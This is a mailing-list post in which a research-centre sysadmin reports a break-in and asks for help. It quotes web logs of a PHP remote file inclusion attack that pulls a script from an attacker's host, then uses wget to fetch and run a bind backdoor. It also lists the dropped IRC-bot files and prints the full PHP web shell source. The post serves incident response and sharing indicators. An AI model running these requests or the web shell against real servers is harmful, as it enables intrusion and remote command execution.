[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Hack attempt
Hi all.
This is my first post here. I'm Norbert Crettol, one of the sysadmins
of Idiap, a research center in Switzerland (www.idiap.ch).
We've had a undesired visitor, last night, that I discovered in the
reports of tripwire.
Here are the logs we got (we get a remote copy of the web server logs
in another host). As of the second line, I've stripped the head and
the tail of the line which is allways the same.
--- begin ---
"GET /<some script>.php?bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=id HTTP/1.0" 200 6625 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=uname%20-a
bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=wget
bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=/sbin/ifconfig%20-a
bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=cd%20/var/;ls%20-la
bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=cd%20/var/lock/;ls%20-la
bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=cd%20/var/lock/;wget%20bosscalvin.com/bind2080
bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=cd%20/var/lock/;chmod%20755%20bind2080
bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=cd%20/var/lock/;./bind2080
--- end ---
I've seen no other
It looks like bind8080 has created a directory /var/lock/.tmp
and expanded an (owned by the web server owner) archive there. Here
is the list of the files :
3225 jui 20 03:53 c-leet
15 jui 20 03:47 c-leet.dir
51 jui 20 03:47 cron.d
512 mai 12 2002 doc/
14 jui 21 16:27 eggdrop -> eggdrop-1.6.10*
2523568 mai 12 2002 eggdrop-1.6.10*
512 mai 12 2002 filesys/
343 fév 11 03:55 fuck*
512 mai 12 2002 help/
21149 nov 4 2003 kik*
1024 jui 21 11:00 language/
512 mai 12 2002 logs/
6 jui 20 03:48 pid.CaEm-
23065 jan 29 15:00 proc*
6 jui 20 03:48 psybnc.pid
28591 mai 12 2002 README
89 jui 20 03:53 run*
588 avr 1 10:00 run-*
708 avr 1 10:00 run--*
512 mar 31 08:12 scripts/
512 mai 12 2002 text/
2523568 mar 28 01:41 vi*
30293 nov 17 2002 xhide*
182 jui 20 03:47 y2kupdate*
Here is the content of http://www.bosscalvin.com/inject.txt :
--- begin ---
<font color="red">
<br><font face="Comic Sans MS" size="2"><center>
<b>CMD</b> - System Command<br><br></center></font><font face="Verdana" size="1"></center><br>
<b>#</b> CMD PHP : <br>
<b>#</b> Released by : <b>SecurityCorp</b><br>
<b>#</b> Edited by CaEm
<br>
<br>
<hr color="red" width=751px height=115px>
<br>
<pre><font face="Verdana" size="1">
<?
// CMD - To Execute Command on File Injection Bug ( gif - jpg - txt )
if (isset($chdir)) @chdir($chdir);
ob_start();
system("$cmd 1> /tmp/nobody 2>&1; cat /tmp/nobody; rm -rf /tmp/nobody");
$output = ob_get_contents();
ob_end_clean();
if (!empty($output)) echo str_replace(">", ">", str_replace("<", "<", $output));
?>
</font></pre>
<br>
<hr color="red" width=751px height=115px>
<br>
<font face="Comic Sans MS" size="1"><b>« CaEm » </b><br><b>@ </b><b> îrç.Ðå£.ñët <i>#Renjana</i></b><br>
--- end ---
Has someone seen this kind of attack ? (chkrootkit doesn't detect it).
Has someone heard of this www.bosscalvin.com (or www.calvinmumu.org) ?
Is there a way to stop this guy ? His nickname (CaEm) appears in the
the uploaded scripts.
Norbert